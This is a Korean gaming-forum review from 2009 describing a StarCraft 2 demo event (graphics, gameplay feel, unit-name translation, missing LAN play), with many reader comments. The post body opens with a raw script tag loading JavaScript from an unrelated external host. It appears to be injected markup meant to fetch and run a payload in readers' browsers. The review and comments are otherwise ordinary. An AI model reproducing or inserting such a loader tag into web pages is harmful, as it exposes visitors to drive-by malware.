총 게시물 434건, 최근 0 건 안내
[리뷰]

스타크래프트2 플레이 소감

글쓴이 : 퀘이크마스터  (218.♡.56.204) 날짜 : 2009-08-12 (수) 11:47 조회 : 31382

<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script> e스타즈2009 에서 같이 진행되는 스타크래프츠2 최초 공개시연회에 참석하였습니다. 블리자드는 중앙일보 측의 강력한 요청으로 상당한 비용지원을 받고 nvidia측의 하드웨어 지원을 받아 비용을 비교적 적게 들이면서 공개시연회를 연 것으로 파악되었습니다. 시연장은 setec 3관 전체를 대관하여 메인무대와 방청석 약 200석, 그리고 게임시연대 약 100대 그리고 블리자드 스토어 및 nvidia 3D vision 체험관 으로 구성되어 있었습니다. 게임을 직접 해보고 프로게이머가 스타크래프트2 대회를 하는 것을 구경하는 정도 .. 그리고 블리자드 스토어에 있는 스타 관련 다양한 머천다이징 상품들을 감상하는 정도의 재미요소가 있었습니다. 다만 사전 홍보가 잘 되지 않았는지 사람들이 많이 오지는 않았더군요. 1:1 로 로스트템플에서 플레이한 소감입니다. 1. 완성도 마크모하임 대표가 금년 내로 출시하겠다고 발표를 하였고 출시일정과 관련하여 설왕설래가 많았는데 게임 상태를 볼 때 금년 내 출시는 무난할 것으로 예상되었습니다. 밸런스 적인 문제가 있으면 모를까 대부분의 개발은 마무리가 된 것으로 보였습니다. (며칠 전 기사를 보니 내년으로 미루어 졌네요) 2. 첫 느낌 멀리서 처음 보았을 때 스타크래프트 1과 차이를 느낄 수 없을 정도로 전체적인 색감이나 구도가 비슷합니다. UI 도 완전 동일하고 사운드의 느낌도 1편과 많이 비슷했습니다. 1편을 즐긴 사람이라면 누구라도 이질감 없이 즐길 수 있도록 만든 것 같았습니다. 특히 3D 로의 변환으로 인해 캐릭터의 이동이나 반응이 느릴 것이라는 것은 기우에 불과했습니다. 스타 1편의 느낌과 거의 동일하게 즐길 수 있었습니다. 휠을 돌릴 경우 시점 변환이 되는데 이 부분 역시 1편의 느낌을 살리기 위해 확대축소가 아닌 tilt의 느낌으로서 플레이어가 필요한 기능이라기 보다는 옵저버 모드에서 구경하기 좋은 기능으로 보였습니다. 3. 그래픽 일단은 3D 이지만 2D의 느낌이 많이 살아 있습니다. 화면이 pan 되지 않아서 멀리서 보면 2D 같이 느껴질 수도 있겠습니다. 캐릭터나 배경의 디테일이 굉장히 살아 있어서 소소한 부분까지 에니메이션이 되어 있으며 적절한 매핑으로 번쩍 번쩍 광택과 미끈하고 질퍽 거리는 느낌, 거친 느낌 등 다양한 캐릭터의 질감이 잘 살아 있었습니다. 특히 전투 시 발생하는 폭발, 사망, 등 다양한 연출 시 배경과 조화를 이루어 화면이 일그러 진다거나 발사체를 따라 조명이 이동하면서 그림자가 휘리릭 변화한다던가 등 굉장히 디테일한 연출이 돋보였습니다. 멀리서 보면 스타 1 같은 느낌이지만 가까이서 보면 굉장히 디테일하다고 보시면 되겠습니다. 4. 재미 속도면에 있어서 1편과 동일하며 테크트리나 조작방법이 동일하기 때문에 스타1 을 하는 느낌이었습니다. 다만 효과나 움직임이 굉장히 리얼하고 새로운 유닛, 기술들이 있어서 뭐랄까 스타1편의 재미에 플러스 알파 정도라고 보면 될 것 같습니다. 즉, ... 상당히 재미 있습니다. 사실 상 최근 출시된 rts들을 보면 리얼타임 이기는 하지만 긴장감 완화 측면에서 조작도 간소화 되고 편의지향적 게임들이 많이 나왔었습니다. 스타2는 그냥 고전적인 rts 로서 정신 없이 화면 전환하고 정신없이 유닛 뽑고 이동시키고 ... 모두 수작업으로 해야 하는 스타 1의 느낌과 같아서 게임을 하는 내내 긴장을 놓을 수가 없었습니다. 5. 현재 스타크래프트2의 문제점 일단 번역에 문제가 좀 있습니다. 스타 1을 해보신 분들은 아시겠지만 저그를 하는 경우 하이브에서 라바를 가지고 드론을 만든다 하면 하이브 클릭 > s > d 의 단축키 순서이죠. 오버로드라고 한다면 클릭 > s > o 이겠지요. 지금도 1편과 동일한 단축키를 가지고 있습니다. 그런대 유닛명이 다릅니다. 오버로드는 '대군주' 라고 되어 있었습니다. 모든 유닛, 건물의 고유명사가 완전 번역이 되어서 더 이상 라바, 질럿, 성큰 콜로니, 마린 ... 이런 이름은 볼 수가 없습니다. 단축키는 영문 기준인데 유닛명은 한글이니 아무래도 햇갈릴 수 밖에 없는 구조입니다. 개다가 e스포츠의 핵심인 대회 중계에 있어서도 많은 문제점이 드러났습니다. 해설자는 계속해서 설명 중에 아 네 대군주가 모자르군요... 미리 준비를 했어야죠! 아 네. 대군주는 오버로드입니다. 오버로드를 말합니다. 이런 식의 중계였습니다. 시간이 많이 지나면 고유명사화된 새로운 한글이름이 물론 정착이 되겠지만 초반에는 햇갈릴 수 밖에 없겠더라구요. 또 다른 문제는 LAN 의 부재입니다. 불법 네트워크 플레이를 막기 위해서 겠지만 아무래도 회사에서 학교에서 PC방에서 ... 옆 친구와 손 쉽게 하던 재미는 없어질 듯 합니다. 1:1 승부 결과는 제가 졌습니다 ^^ 예전에 임요환의 드랍쉽 이라는 책을 저술했을 정도였는데 안되더군요. 제가 못하는 건지 ... 테크트리가 달라진 부분들이 있어 많이 해맸는데 히드라를 모아놓고서 럴커 변이를 시키지 못해서 이름이 달라서 햇갈려서 ;; 제가 멀티를 공략한 사이 멀티를 버리고 본진에서 대규모 병력을 만든 프로토스에게 거상을 중심으로 당해 버렸죠 ^^ 올 연말 출시될 스타크래프트2 와 상생하기 위해 우리도 많은 준비를 해야겠다고 느꼈습니다. 그리고 언젠간 한국도 이런 게임을 사용자에게 제공할 수 있는 회사가 나타났으면 좋겠다고 느꼈습니다. 블리자드 직원 티셔츠를 입고 있던 제 친구녀석이 제 앞아서 자랑스러워 했던 것 처럼 저도 우리 회사 티셔츠를 입고서 업계 동료들에게 자랑할 날이 어서 오기를 기다립니다 ! 화이팅 !

어나더여리 (58.♡.134.247) 2009-08-12 (수) 11:58
유닛명 한글화 썩 맘에 안드네요..
댓글주소
펄리 (116.♡.30.21) 2009-08-12 (수) 12:12
글 잘 읽었습니다.

제가 마치 시연회에 참석한 듯한? 느낌이 드네요 ㅋ
댓글주소
잇힝님 (114.♡.59.63) 2009-08-12 (수) 12:51
리뷰보니까 기대되네요..관심 없었는데..ㅎㅎ

그런데 퀘이크마스터님 예전부터 활동하셨던 분인가요?
댓글주소
퀘이크마스터 (218.♡.56.204) 2009-08-12 (수) 13:18
글은 자주 안 쓰지만 베타겜은 하루에 두번 이상 매일 ~ 들어온 지 몇 년 됫어요 ^^
댓글주소
df;lgnksd;lrktgns… (211.♡.5.55) 2009-08-12 (수) 13:20
1:1 승부 결과는 제가 졌습니다 ^^ 예전에 임요환의 드랍쉽 이라는 책을 저술했을 정도였는데

안되더군요.  제가 못하는 건지 ...

임요환님이십니까???
댓글주소
퀘이크마스터 (218.♡.56.204) 2009-08-12 (수) 13:40
임요환 아니에요 ^^ 설마 프로게이머가 직접 쓸리가요 ^^
댓글주소
닉네임여섯개 (211.♡.134.239) 2009-08-12 (수) 14:49
임요환의 드랍쉽이라고해서 임요환선수 혼자쓴게 아닙니다..;;ㅡㅡ
댓글주소
암흑창조의빛 (119.♡.45.7) 2009-08-12 (수) 18:25
DOW1 했을때가 기억난다 한글화때 데몬을 디먼으로 번역했는데 처음엔 무지 어색하고 웃겼는데 하다보니 오히려 디먼이 더 익숙해지고 데몬이 이상해지던.. 그런데 카메라 무빙은 정말 DOW1때가 최고였는데 다른게임들은 왜 그렇게 안만들지
댓글주소
풀옵쌩쌩 (116.♡.152.191) 2009-08-12 (수) 18:47
퀘이크마스터 님 옛날에 킹콩동영상리뷰 올려주신분 맞죠?

여친사진도 올리시고 했던분이신거같은뎅... 결혼하셨나... ㅋ
댓글주소
풀옵쌩쌩 (116.♡.152.191) 2009-08-12 (수) 18:51
찾았당

<a class=auto href=http://betagam.gameshot.net/zboard/view.php?id=free&page=1&sn1=&divpage=8&sn=on&ss=off&sc=off&keyword=퀘이크마스터&select_arrange=headnum&desc=asc&no=59219>http://betagam.gameshot.net/zboard/view.php?id=free&page=1&sn1=&divpage=8&sn=on&ss=off&sc=off&keyword=퀘이크마스터&select_arrange=headnum&desc=asc&no=59219</a> <a class=auto_new href=http://betagam.gameshot.net/zboard/view.php?id=free&page=1&sn1=&divpage=8&sn=on&ss=off&sc=off&keyword=퀘이크마스터&select_arrange=headnum&desc=asc&no=59219 target=_blank>[새창에서 열기]</a>
댓글주소
퀘이크마스터 (218.♡.56.204) 2009-08-12 (수) 19:35
헉 !!! ㄷㄷㄷ 장난 아니시네요 ;;; 저걸 어떻게 찾으셨대요 ;;

저 ... 지금은 결혼 했습니다 ^^; 차도 바뀌었고 저도 많이 늙었고 이제 ^^;

직장도 바뀌었고^^ ... 게시물 하나 올렸을 뿐인데 4년 전의 추억을 보게 될 줄이야 ^^;  ㅋㅋ 감사합니다.

아쉽게도 저 위의 사진 속의 여친과 결혼하진 않았지만 ^^ 저 친구도 잘 살고 있겠죠 지금은 ^^

옛날 생각 나네요 ㅋ
댓글주소
좆타 (168.♡.10.102) 2009-08-12 (수) 21:58
퀘이크님 이모티콘 엄청 쓰셨음ㅋㅋㅋ
댓글주소
草監 (211.♡.217.191) 2009-08-12 (수) 23:09
으악 미남이시다 ㅋ 퀘이크마스터님이 만드는 게임이 궁금합니다~
댓글주소
제뤼형 (115.♡.223.99) 2009-08-13 (목) 00:27
유닛명의 한글화는 그저 익숙함의 차이같구요... 스타2 해볼만 하겠네요 ㅎㅎ
댓글주소
퀘이크마스터 (118.♡.245.57) 2009-08-13 (목) 00:27
아 네 . 저는 게임을 직접 만드는 개발자는 아니고 마케팅을 하는 사람이에요 ^^ 이 일 시작한지도 한 10년 되서 ... 여러 게임이 거쳐 갔네요 ^^
댓글주소
바보제국 (59.♡.75.119) 2009-08-13 (목) 02:50
소감 잘 봤습니다. 어서 나와서 플레이 해봤으면 좋겠습니다.
댓글주소
lalala``s4pL*OB (119.♡.17.14) 2009-08-13 (목) 05:19
수고하셨습니다 :)
댓글주소
은색고양이 (70.♡.224.8) 2009-08-13 (목) 05:34
이게 내년에 나온다는 말은 내겐 재앙이상이야~~~~~~~~~~~~~!!
댓글주소
로딩애딩배딩초딩… (121.♡.210.29) 2009-08-13 (목) 11:14
게임 화면이 너무 잡초스럽다 ;;;
댓글주소
코손 (211.♡.250.112) 2009-08-13 (목) 13:50
언제봐도 우주복 안에서 열심히 담배 빠는 마린이 넘 웃김ㅋㅋㅋ
댓글주소
Logitech (121.♡.73.92) 2009-08-13 (목) 14:11
역이서 말도안되는점....

담배 불이

슈트 내로  떨어진다면
마린은

아시발 하면서
뒹굴뒹굴 굴텐데...

더군다나;;

슈트를 나사로 조립해서;;

담배불 꺼질대까지 고통을 즐겨야..
댓글주소
IceDem (123.♡.8.211) 2009-08-13 (목) 18:46
저 시대에는 담배도 많이 발달해서, 저렇게 헬멧쓰고 피워도 되는 담배가 아닐지? ㅋㅋ
댓글주소
李晙浩 (218.♡.69.21) 2009-08-13 (목) 22:21
[존레논] 수트 속에서 담배 피우기 -> 그냥 별 의미 없는 간지 설정일 뿐임...
댓글주소
이정호 (123.♡.176.208) 2009-08-14 (금) 00:40
담배 연기때문에라도 안 보임ㅋㅋ 따지면 한도 끝도 없다는ㅋㅋ
댓글주소
우라카타 (168.♡.68.29) 2009-08-14 (금) 02:17
잘 봤습니다. ^^
댓글주소
올리버 (210.♡.122.13) 2009-08-14 (금) 09:14
잘 봤어요~~ 마린들은 "10분간 휴식" 이럴때 담배 문다죠 ㅋㅋ..
댓글주소
비누거품 (124.♡.185.102) 2009-08-14 (금) 23:13
유닛명 한글화인가 .. 그래도 별로 관심이 안가네요

역시 시뮬레이션은 저한태는 별로라는
댓글주소
Dervish (68.♡.112.219) 2009-08-23 (일) 20:44
비누거품님

Battleforge

한번 알아보세요 = ]

저도 RTS는 잼병이었는데 저 게임으로 RTS 재미를 느끼고 있어요 ㅎㅎ,.
댓글주소
제노바 (121.♡.39.99) 2009-09-05 (토) 20:08
기대기대 +_+
댓글주소
듀난 (122.♡.173.92) 2009-09-07 (월) 05:38
진짜 담배가 안으로 들어간다면 ... 지옥!!!
댓글주소
호카게 (58.♡.35.4) 2009-09-25 (금) 12:24
개 허접 게임 미국의 한 게임사로 인해 나라가 흔들려 아나 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
댓글주소
Elibur (124.♡.233.48) 2009-10-04 (일) 23:13
블리자드가 혁신적인 아이디어는 하나도 없이 대박들을 치기는 하지만 개허접 게임 회사는 절대 아닙니다 --
원래 명작 게임들 중에는 혁신적인 게임들도 있고 혁신적이진 않지만 완성도가 높아서 성공하는 게임들도 있고 그런거죠.. 블리자드 게임들은 후자 쪽이구요.
댓글주소
elicia (58.♡.13.7) 2009-10-08 (목) 00:12
저도 스타 몇년동안 할 정도로 팬이었고
스타 처음 나와서 한 1~2년 별 인기없을때도
출시때부터 재미붙여서 플레이했던 사람이지만
국내플레이어들은 RTS에 있어서는 너무 편식하는 경향이 있는거 같아요
스타보다 잘만든 RTS게임도 많은데 다들 친근하지가 않으니까 잘 안하려고 하더라고요
하더라도 싱글만 깨고 멀티는 안하고..(물론 시디키가 없어서 멀티 못하는 사람들이 더 많겠죠;;;)

아.. 옛날에 손가락 부러졌을때도 깁스하고 PC방가서 스타한거 생각하면..
댓글주소
MyGameLife (121.♡.132.10) 2010-02-14 (일) 23:20
이번에 스타2나오면 RTS에 다시 한 번 도전을 해봐야겠네요.
댓글주소
Kazanell (61.♡.193.100) 2010-04-08 (목) 21:32
유닛명은... 그냥 영어로 내비둿으면....
댓글주소
rndbsgud (61.♡.123.75) 2010-04-14 (수) 09:14
음... 우리나라가 저런게임을 만든다라... 그건 지금 복돌이들 때문에 불가능합니다. 돈을 벌수있어야 능력이있더라도 자금사정상... 당연히 실패할 패키지게임을 만들지않는게 우리나라사정입니다 음그리고 혹시 온라인으로만들면 된다라는 것은 솔직히 우리나라에서 온라인게임이라...그것도스타같은게임이라면... 인기가있어지면 뻔히 캐쉬가존재할테고 그리고 부분유료 정액제이런건 스타같은건 멀티가 돈내고하는게아니라 타이틀을 사면 게임회사가 멀티를 막지않는한 할수있는게 장점인데... 우리나라회사에서만들더라도 아마도 그건... 불가능하다고생각하는 부정적인사람입니다. 물론 게임쪽에 한해서지만...
댓글주소

총 게시물 434건, 최근 0 건 안내
번호 분류 이미지 제목 글쓴이 날짜 추천 비추천 조회
1 2 3 4 5 6 7 8 9 10